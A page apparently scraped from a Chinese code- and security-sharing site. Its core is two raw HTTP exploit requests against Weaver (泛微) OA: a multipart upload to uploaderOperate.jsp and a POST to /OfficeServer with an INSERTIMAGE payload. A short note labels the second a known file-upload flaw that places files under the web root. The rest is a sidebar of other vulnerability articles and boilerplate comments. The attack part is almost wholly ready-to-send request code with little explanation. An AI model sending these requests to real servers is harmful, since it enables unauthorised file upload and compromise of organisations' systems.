POST /workrelate/plan/util/uploaderOperate.jsp HTTP/1.1

Host: X.X.X.X

Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="101", "Google Chrome";v="101"

Sec-Ch-Ua-Mobile: ?0

Sec-Ch-Ua-Platform: "macOS"

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like

Gecko) Chrome/101.0.4951.64 Safari/537.36

Accept:

text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/

*;q=0.8,application/signed-exchange;v=b3;q=0.9

Sec-Fetch-Site: none

Sec-Fetch-Mode: navigate

Sec-Fetch-User: ?1

Sec-Fetch-Dest: document

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9,en;q=0.8

Connection: close

Content-Type: multipart/form-data; boundary=----WebKitFormBoundarymVk33liI64J7GQaK

Content-Length: 393

------WebKitFormBoundarymVk33liI64J7GQaK

Content-Disposition: form-data; name="secId"

------WebKitFormBoundarymVk33liI64J7GQaK

Content-Disposition: form-data; name="Filedata"; filename="testlog.txt"

------WebKitFormBoundarymVk33liI64J7GQaK

Content-Disposition: form-data; name="plandetailid"

------WebKitFormBoundarymVk33liI64J7GQaK—

泛微 OA /defaultroot/officeserverservlet ：确认为历史漏洞；
详情： /officeserverservlet 路径文件上传
> 将文件释放至跟网站根路径下 在数据包中将 fileid 替换

POST /OfficeServer HTTP/1.1

Host: X.X.X.X

Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="101", "Google Chrome";v="101"

Sec-Ch-Ua-Mobile: ?0

Sec-Ch-Ua-Platform: "macOS"

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like

Gecko) Chrome/101.0.4951.64 Safari/537.36

Accept:

text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/

*;q=0.8,application/signed-exchange;v=b3;q=0.9

Sec-Fetch-Site: none

Sec-Fetch-Mode: navigate

Sec-Fetch-User: ?1

Sec-Fetch-Dest: document

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9,en;q=0.8

Connection: close

Content-Type: multipart/form-data; boundary=----WebKitFormBoundarymVk33liI64J7GQaK

Content-Length: 207

------WebKitFormBoundarymVk33liI64J7GQaK

Content-Disposition: form-data; name="aaa"

{'OPTION':'INSERTIMAGE','isInsertImageNew':'1','imagefileid4pic':'20462'}

------WebKitFormBoundarymVk33liI64J7GQaK—

感谢您的来访，获取更多精彩文章请收藏本站。

喜欢就支持一下吧

点赞 6 赞赏 分享

QQ空间 微博 QQ好友 海报分享 复制链接

收藏

阿里云盘资源分享(2022年8月10日更新)

阿里云盘资源分享(2022年8月10日更新)

8月12日 00:39 3451

为什么没人帮晚年辛德勒？辛德勒在犹太人心里地位

为什么没人帮晚年辛德勒？辛德勒在犹太人心里地位

9月5日 05:19 2054

Oracle WebLogic Server信息泄漏漏洞CVE-2022-21371

Oracle WebLogic Server信息泄漏漏洞CVE-2022-21371

4月18日 16:42 1971

红帆医疗云OA医用版前台SQL注入漏洞

红帆医疗云OA医用版前台SQL注入漏洞

8月6日 07:00 1801

Jellyfin RemoteImageController.cs SSRF漏洞 CVE-2021-29490

Jellyfin RemoteImageController.cs SSRF漏洞 CVE-2021-29490

4月18日 18:06 1730

雷蛇炼狱蝰蛇v2驱动设置（雷蛇炼狱蝰蛇驱动如何调）

雷蛇炼狱蝰蛇v2驱动设置（雷蛇炼狱蝰蛇驱动如何调）

8月5日 05:20 1727

• Oracle WebLogic Server信息泄漏漏洞CVE-2022-21371
• 红帆医疗云OA医用版前台SQL注入漏洞
• Jellyfin RemoteImageController.cs SSRF漏洞 CVE-2021-29490
• Swagger-UI 跨站脚本XSS漏洞
• 深信服VPN任意用户添加漏洞
• 绿盟下一代防火墙 resourse.php 任意文件上传漏洞

评论 共2条

欢迎您留下宝贵的见解！

提交

3451人已阅读

阿里云盘资源分享(2022年8月10日更新)

TOP1

为什么没人帮晚年辛德勒？辛德勒在犹太人心里地位

9月5日 05:19 2054人已阅读

TOP2

Oracle WebLogic Server信息泄漏漏洞CVE-2022-21371

4月18日 16:42 1971人已阅读

TOP3

红帆医疗云OA医用版前台SQL注入漏洞

8月6日 07:00 1801人已阅读

TOP4

Jellyfin RemoteImageController.cs SSRF漏洞 CVE-2021-29490

4月18日 18:06 1730人已阅读

TOP5

雷蛇炼狱蝰蛇v2驱动设置（雷蛇炼狱蝰蛇驱动如何调）

8月5日 05:20 1727人已阅读

TOP6

周虹文(周虹文介绍)

7月24日 05:19 1479人已阅读

TOP7

扎职粤语高清完整版(扎职2粤语高清免费观看)

8月8日 05:19 1357人已阅读

TOP8

近期评论

三王 9月13日 10:01 0

文章不错，感谢作者分享！

leimu 9月12日 23:55 0

这篇文章写的真不错，真详细，点个赞。

杨的 9月12日 10:01 0

文章不错，感谢作者分享！

svip886 9月9日 03:44 0

密码不对

的张 9月8日 10:01 0

受益匪浅，感谢子云提供的平台。

市角 9月7日 10:01 0

受益匪浅，感谢子云提供的平台。

卡的 9月5日 10:01 0

作者太厉害了，这篇文章我喜欢666！

撒惨 9月5日 10:01 0

受益匪浅，感谢子云提供的平台。

的宇 9月4日 10:01 0

终于找到组织了，堪比全网最全

虚死 9月2日 10:01 0

文章来自大自然的灵感，好喜欢这篇文章。

我也是有底线哒~

子云社区(www.zilyun.com)是一个致力于分享网站源码与技术分享论坛！为网友免费提供全面的网站源码、技术分享、网络安全、小程序源码、网赚项目、网站模板等文章。

隐私政策

鄂ICP备2022000270号-4

鄂公网安备 42900602000312号

本站一些文章来自互联网收集，仅供用于学习和交流，请遵循相关法律法规. 本站一切资源不代表本站立场，如有侵权/违规/不妥请联系本站删除，敬请谅解.

官方QQ群